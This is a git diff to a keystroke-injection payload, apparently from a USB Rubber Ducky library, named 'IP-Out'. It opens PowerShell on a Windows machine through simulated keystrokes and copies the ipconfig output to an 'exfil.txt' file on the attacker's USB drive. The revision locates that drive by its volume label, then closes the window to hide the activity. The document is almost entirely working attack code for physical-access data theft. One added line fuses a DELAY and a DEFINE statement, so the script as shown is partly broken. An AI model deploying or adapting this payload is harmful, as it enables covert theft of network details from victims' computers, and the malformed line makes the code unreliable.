diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 734c9d6..c9746ef 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -54,8 +54,8 @@ DELAY 500 GUI r DELAY 300 STRINGLN Powershell -DELAY 1000 -STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8 +DELAY 1000DEFINE #DRIVELABEL DUCKY +STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY ALT F4